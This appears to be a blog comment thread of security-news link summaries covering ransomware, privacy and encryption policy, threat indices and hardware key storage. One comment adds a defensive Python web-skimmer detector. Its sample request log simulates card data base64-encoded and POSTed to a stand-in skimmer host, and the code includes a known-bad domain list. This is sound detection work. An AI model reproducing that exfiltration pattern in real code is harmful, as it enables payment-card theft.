    The numerous law enforcement operations leading to the arrests and takedown of ransomware operations in 2021 have forced threat actors to narrow their targeting scope and maximize the efficiency of their operations. Most of the notorious Ransomware-as-a-Service (RaaS) gangs continue their operations even after the law enforcement authorities have arrested key members but have refined their tactics for maximum impact.

  23. Tomi Engdahl says:

    Massachusetts Lawmakers Weighing Online Data Privacy Bill
    https://www.securityweek.com/massachusetts-lawmakers-weighing-online-data-privacy-bill

    A bill that would grant Massachusetts residents what supporters describe as fundamental internet privacy rights — including greater control over their personal information — is making its way through the Statehouse.

    The bill, which would set standards for how companies can collect and sell personal information, was unanimously approved by the Legislature’s Committee on Advanced Information Technology this week.

    Supporters say the bill builds on similar efforts in Colorado, Virginia, and California and would help modernize Massachusetts’ laws for the digital age. Critics warn a state-by-state patchwork of regulations could unfairly burden businesses trying to comply with the laws.
  24. Tomi Engdahl says:

    Target Open Sources Web Skimmer Detection Tool
    https://www.securityweek.com/target-open-sources-web-skimmer-detection-tool

    Retail giant Target this week announced the open source availability of an internal tool designed for the detection of web skimming attacks.

    Dubbed Merry Maker, the tool analyzes payment page code served to users and network traffic from test payment transactions to identify any malicious indicators. The company says it has been using the tool since 2018 to perform more than one million website scans.

    In addition to simulating a real site visitor and saving the generated code and network activity for analysis, the utility searches for new and known malicious domains and creates an alert when any is identified. The tool supports Basic, Kafka, and GoAlert alerts.

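    A minimal version of the checks the article describes, written here as an added illustration rather than Target's Merry Maker code: it pulls external script sources and form actions out of a captured checkout page, adds the hosts seen in the request log of a simulated test transaction, and raises an alert for any host that is on a known-bad list, that is missing from the page's approved baseline, or that received the test card number the simulated visitor typed in. The domain names, the HTML, the request log and the test card number are constructed sample data; the baseline and known-bad sets stand in for the site inventory and threat feed a real deployment would consult.

```python
"""Web-skimmer indicator check over a captured checkout page and its request log.

Added example in the spirit of the tool described above; it is not Target's
Merry Maker code. Every domain, the HTML and the log entries are constructed.
"""
import base64
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed: first-party and approved third-party hosts for this checkout page.
BASELINE_DOMAINS = {"shop.example", "cdn.shop.example", "pay.example-psp.test"}
# Constructed: stand-in for a threat-intel feed of known skimmer collection hosts.
KNOWN_BAD_DOMAINS = {"skimmer-collect.test"}
# Card number the simulated visitor enters; a well-known test value, never a real PAN.
TEST_PAN = "4111111111111111"


class PageRefs(HTMLParser):
    """Collect external script sources and form actions from the checkout HTML."""

    def __init__(self):
        super().__init__()
        self.script_srcs = []
        self.form_actions = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and a.get("src"):
            self.script_srcs.append(a["src"])
        elif tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])


def host_of(url):
    """Lowercase hostname of an absolute URL, or None for relative or odd values."""
    h = urlparse(url).hostname
    return h.lower() if h else None


def carries_test_pan(body):
    """True if the test card number is in the body, either plain or base64-encoded."""
    if TEST_PAN in body:
        return True
    try:
        return TEST_PAN in base64.b64decode(body, validate=True).decode("latin-1")
    except ValueError:  # binascii.Error is a ValueError: body was not base64
        return False


def analyze(page_html, request_log):
    """Return (severity, reason, domain) alerts for one simulated test transaction.

    request_log: list of dicts with 'method', 'url' and 'body', captured while
    the simulated visitor completed the checkout.
    """
    refs = PageRefs()
    refs.feed(page_html)
    observed = {}  # domain -> contexts in which it appeared
    for u in refs.script_srcs:
        observed.setdefault(host_of(u), set()).add("script")
    for u in refs.form_actions:
        observed.setdefault(host_of(u), set()).add("form-action")
    for req in request_log:
        observed.setdefault(host_of(req["url"]), set()).add("network")

    alerts = []
    for domain in sorted(d for d in observed if d):
        if domain in KNOWN_BAD_DOMAINS:
            alerts.append(("critical", "known skimmer domain", domain))
        elif domain not in BASELINE_DOMAINS:
            ctx = ",".join(sorted(observed[domain]))
            alerts.append(("warning", f"domain outside checkout baseline ({ctx})", domain))
    # Strongest indicator: the test card number left the page toward a non-baseline host.
    for req in request_log:
        d = host_of(req["url"])
        if d and d not in BASELINE_DOMAINS and carries_test_pan(req.get("body", "")):
            alerts.append(("critical", "test card number sent to non-baseline host", d))
    return alerts


# Constructed checkout page: one approved script, one unknown analytics tag.
SAMPLE_HTML = """<html><body>
<script src="https://cdn.shop.example/checkout.js"></script>
<script src="https://static.analytics-vendor.test/tag.js"></script>
<form action="https://pay.example-psp.test/submit" method="post">
  <input name="card"><input name="cvv">
</form>
</body></html>"""

# Constructed request log: the legitimate PSP post plus a base64-encoded copy
# of the same fields going to a known skimmer host.
SAMPLE_LOG = [
    {"method": "GET", "url": "https://cdn.shop.example/checkout.js", "body": ""},
    {"method": "POST", "url": "https://pay.example-psp.test/submit",
     "body": "card=4111111111111111&cvv=123"},
    {"method": "POST", "url": "https://skimmer-collect.test/g",
     "body": base64.b64encode(b"card=4111111111111111&cvv=123").decode()},
]

if __name__ == "__main__":
    for sev, reason, domain in analyze(SAMPLE_HTML, SAMPLE_LOG):
        print(f"[{sev}] {domain}: {reason}")
```

    On the sample data this yields three alerts: the known-bad host, a warning for the analytics vendor that is not in the baseline, and a critical alert because the test card number reached a host outside the baseline. The baseline-versus-known-bad split matters in practice: a new third-party script is usually a change-management question, whereas card data leaving toward an unapproved host is an incident.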
  25. Tomi Engdahl says:

    Todd Bishop / GeekWire:
    Profile of Charlie Bell, who leads Microsoft’s 10,000-person security engineering organization, as the company passes $15B annual revenue from security products — “Your code will be attacked.” — That warning, so obvious today, was a blunt wake-up call 20 years ago for many of the …

    https://www.geekwire.com/2022/former-amazon-exec-inherits-microsofts-complex-cybersecurity-legacy-in-quest-to-solve-one-of-the-greatest-challenges-of-our-time/

  26. Tomi Engdahl says:

    Riana Pfefferkorn / The Center for Internet and Society:
    A close look at how the EARN IT Act, which is modeled after FOSTA and was recently reintroduced in Congress, would harm online speech, privacy, and security

    The EARN IT Act Is Back, and It’s More Dangerous Than Ever
    http://cyberlaw.stanford.edu/blog/2022/02/earn-it-act-back-and-it%E2%80%99s-more-dangerous-ever

    This is the latest entry in my lengthy archive of writing, talks, and interviews about the EARN IT Act

  27. Tomi Engdahl says:

    Ian Bogost / The Atlantic:
    Digital assets like NFTs give us a glimpse into a future where every aspect of human life that can be digitally recorded is collateralized and securitized

    The Internet Is Just Investment Banking Now
    The internet has always financialized our lives. Web3 just makes that explicit.
    https://www.theatlantic.com/technology/archive/2022/02/future-internet-blockchain-investment-banking/621480/?scrolla=5eb6d68b7fedc32c19ef33b4

    Twitter has begun allowing its users to showcase NFTs, or non-fungible tokens, as profile pictures on their accounts. It’s the latest public victory for this form of … and, you know, there’s the problem. What the hell is an NFT anyway?

    There are answers. Twitter calls NFTs “unique digital items, such as artwork, with proof of ownership that’s stored on a blockchain.” In marketing for the new feature, the company offered an even briefer take: “digital items that you own.” That promise, mated to a flood of interest and wealth in the cryptocurrency markets used to exchange them, has created an NFT gold rush over the past year. Last March, the artist known as Beeple sold an NFT at auction for $69.5 million. The digital sculptor Refik Anadol, one of the artists The Atlantic commissioned to imagine a COVID-19 memorial in 2020, has brought in millions selling editions of his studio’s work in NFT form. Jonathan Mann, who started writing a song every day when he couldn’t find a job after the 2008 financial collapse, began selling those songs as NFTs, converting a fun internet hobby into a viable living.
  28. Tomi Engdahl says:

    Ryan Browne / CNBC:
    The UK updates its Online Safety Bill proposal to outlaw content featuring revenge porn, drug and weapons dealing, suicide promotion, people smuggling, and more

    Britain takes aim at online fraud, revenge porn with beefed-up rules for Big Tech
    https://www.cnbc.com/2022/02/04/britain-beefs-up-online-safety-bill-with-new-criminal-offences.html

    Britain’s landmark Online Safety Bill seeks to combat the spread of harmful and illegal content on social media sites including Facebook, YouTube and TikTok.
    Lawmakers have called on the government to add more offences to the scope of the law, such as self harm, racial abuse and scam advertising.
    The bill will now include provisions outlawing content that features revenge porn, drug and weapons dealing, suicide promotion and people smuggling.

  29. Tomi Engdahl says:

    Google Cloud Gets Virtual Machine Threat Detection
    https://www.securityweek.com/google-cloud-gets-virtual-machine-threat-detection

    Google on Monday announced the public preview of a new tool to help identify threats within virtual machines (VMs) running on its Google Cloud infrastructure.

    The new Virtual Machine Threat Detection (VMTD), now available in the Security Command Center (SCC), provides agentless memory scanning to help identify cryptocurrency-mining malware and other threats in VMs.

    With more and more organizations adopting cloud technologies, the number of threats targeting the cloud has increased significantly, and VMTD represents one of the actions Google is taking to help customers secure their assets, the company said in a note announcing the capability.

    With the majority of compromised cloud instances abused for cryptocurrency mining, VMTD was designed to help protect against this type of attack, as well as against data exfiltration and ransomware, Google says.

    “Because VM Threat Detection operates from outside the guest VM instance, the service does not require guest agents or special configuration of the guest OS, and it is resistant to countermeasures used by sophisticated malware,” Google added.

    The main idea behind VMTD is to help customers identify potentially malicious behavior inside their VMs without requiring them to run additional software, thus ensuring that performance is not altered in any way and that the attack surface remains low.

  30. Tomi Engdahl says:

    Gaining and Retaining Security Staff in The Age of the Great Resignation
    https://www.securityweek.com/gaining-and-retaining-security-staff-age-great-resignation

    Cybersecurity employers need to adapt their recruitment and retention practices to gain from benefits and minimize detriments

    We live in interesting times for cyber talent recruitment and retention. The task is never easy, but is now affected by two conflicting pressures: the ‘Great Resignation’ leading to staff departures, and the growth of remote working potentially increasing the pool of available applicants as replacements.

    The latter is both an advantage for gaining new talent, and a contributor to the Great Resignation. Both effects are arguably influenced by the Covid-19 pandemic. SecurityWeek talked to Jon Check, executive director of cyber protection solutions at Raytheon Intelligence & Space to gain practical insight into today’s staffing problems and solutions. Raytheon I&S provides services and support to customers largely in the government and the defense industries.

  31. Tomi Engdahl says:

    A new technique hides the key completely
    https://etn.fi/index.php/13-news/13145-uusi-tekniikka-salaa-avaimen-taeysin

    Systems-on-chip can already generate a chip's encryption key from the physical characteristics that arise during manufacturing. Typically this unique key is stored on the chip in a fuse, which is not enough for complete protection. A technique developed by PUFsecurity solves the problem.

    In security the talk now is of a root of trust, that is, device-level security. A PUF (Physical Unclonable Function) refers to the unique variations that arise in chip manufacturing, from which a unique key can be created on the chip. PUFsecurity and eMemory have now developed a security solution in which these two functions are combined.

    In practice, the PUFrt solution is a combination of a quantum-tunneling-based PUF and eMemory's anti-fuse-based one-time programmable memory. PUFsecurity points out that security is only as strong as its weakest link. A unique key is not enough if it is not stored in a way that cannot be broken.

    In a fuse (eFuse) solution, the key produced by the PUF function is programmed into OTP memory with a metal or poly film, which leaves a visible trace. Programming the key into anti-fuse memory is instead done by burning through the chip's oxide. This leaves a conductive path on the chip without any externally visible clue.

    Anti-fuse memory cells look identical from the outside regardless of which key is stored in them. PUFsecurity has already demonstrated the solution together with Arm's CC312 cell (CryptoCell-312), which is the most popular way to implement encryption key storage on systems-on-chip.

    PUFrt: Solving Chip Security’s Weakest Link
    https://blog.pufsecurity.com/2021/12/20/pufrt-solving-chip-securitys-weakest-link/

  32. Tomi Engdahl says:

    EXPERTS CHALLENGE GOVT’S ANTI-ENCRYPTION CAMPAIGN
    https://www.openrightsgroup.org/publications/experts-challenge-govts-anti-encryption-campaign/

    Leading cybersecurity experts and human rights activists say scaremongering tactics are being used to mislead the public and make a bogus case for weakening encryption. Over half a million pounds of taxpayers’ money has been spent on the advertising campaign.
  33. Tomi Engdahl says:

    Typical startup cybersecurity mistakes
    https://www.kaspersky.com/blog/startup-cybersecurity-mistakes/43559/
    You can find about a million tips on how to keep a startup afloat on the Internet. Usually advisers draw attention to the issues of business planning, marketing strategy, attracting additional investment and so on, but articles rarely talk about the problem of building a solid cybersecurity system. However, the lack of a clear understanding of threats can cost a startup a potentially successful business. We decided to talk about the most typical cybersecurity mistakes and, more importantly, how to prevent them.
  34. Tomi Engdahl says:

    January 2022's Most Wanted Malware: Lokibot Returns to the Index and Emotet Regains Top Spot https://blog.checkpoint.com/2022/02/08/january-2022s-most-wanted-malware-lokibot-returns-to-the-index-and-emotet-regains-top-spot/
    Our latest Global Threat Index for January 2022 reveals that Emotet has now pushed Trickbot out of first place after a long stay at the top, and is this month's most prevalent malware, affecting 6% of organizations worldwide. Log4j is also still proving to be a problem, impacting 47.4% of organizations globally, and the most attacked industry continues to be Education/Research. After only two and a half months since its return, Emotet has surged into the top spot. The notorious botnet is most commonly spread via phishing emails that contain malicious attachments or links. Its increased use has only been helped by the prevalence of Trickbot, which acts as a catalyst, spreading the malware even further.
  35. Tomi Engdahl says:

    PrivateLoader: The first step in many malware schemes https://intel471.com/blog/privateloader-malware
    Pay-per-install (PPI) malware services have been an integral part of the cybercrime ecosystem for a considerable amount of time. A malware operator provides payment, malicious payloads and targeting information, and those responsible for running the service outsource the distribution and delivery. The accessibility and moderate costs allow malware operators to leverage these services as another weapon for rapid, bulk and geo-targeted malware infections. By understanding how these services proliferate, defenders can better recognize these campaigns and stop them from wreaking havoc on their organization's IT stack.
  36. Tomi Engdahl says:

    UK anti-encryption drive meets fierce resistance from privacy, security advocates https://portswigger.net/daily-swig/uk-anti-encryption-drive-meets-fierce-resistance-from-privacy-security-advocates
    The UK government's anti-encryption campaign amounts to scaremongering, according to 50 security experts and human rights groups. In an open letter, they claim that the campaign by advertising agency M&C Saatchi, rumoured to have cost the taxpayer £500,000 ($677,000), is being used to soften up public opinion on changes to the Online Safety Bill that would force tech companies to weaken or remove end-to-end encryption (E2EE) in messaging apps.
  37. Tomi Engdahl says:

    Cyber teams from across the globe to compete in 1st International Cybersecurity Challenge https://www.enisa.europa.eu/news/enisa-news/cyber-teams-from-across-the-globe-to-compete-in-1st-international-cybersecurity-challenge
    In partnership with regional and international organisations, the European Union Agency for Cybersecurity (ENISA) will host the first International Cybersecurity Challenge, a Cyber World Cup. Building on the success of the so-called Capture-the-flag competitions (CTFs), ENISA, together with other regional and international organisations, decided to design and host for the first time the International Cybersecurity Challenge (ICC). With this first ever Cyber World Cup, which comprises a number of different cybersecurity challenges, we are entering a new dimension by moving up to a global scale with regional teams joining from all over the world.
  38. Tomi Engdahl says:

    How a Texas hack changed the ransomware business forever https://therecord.media/how-a-texas-hack-changed-the-ransomware-business-forever/
    The early morning hours of August 16, 2019 began with the whirring and burping sound of computer printers. The scratch and screech echoed along the empty corridors of the Borger, Tex. administrative offices, paper sliding from tray to ink jet to tray and then back again. Anyone in the office that steamy Friday who happened to glance at the finished pages would have seen sheets covered in gibberish: all ampersands, exclamation points and broken English. To Jason Whisler, the city's emergency management coordinator, it was clear what this meant: Borger, population 13,000, was suffering from a ransomware attack and those pages on the printers were filled with demands.
  39. Tomi Engdahl says:

    The UK's National Cyber Strategy 2022: An Evolution https://www.paloaltonetworks.com/blog/2022/01/the-uks-national-cyber-strategy-2022/
    The UK Government has once again shifted the cyber discourse with the recent publication of the National Cyber Strategy 2022, marking a significant change in how the government views cybersecurity and solidifying its position as a global cyber power. In fact, the term cyber power is used throughout the strategy and ultimately illustrates the change in how the government views cyberspace, centering on the ability of a state to protect and promote its interests in and through cyberspace. The focus is no longer solely about security, but more on how to harness cyber power for economic and social advantage, elevating the cyber domain from purely a security issue to a whole of society concern.
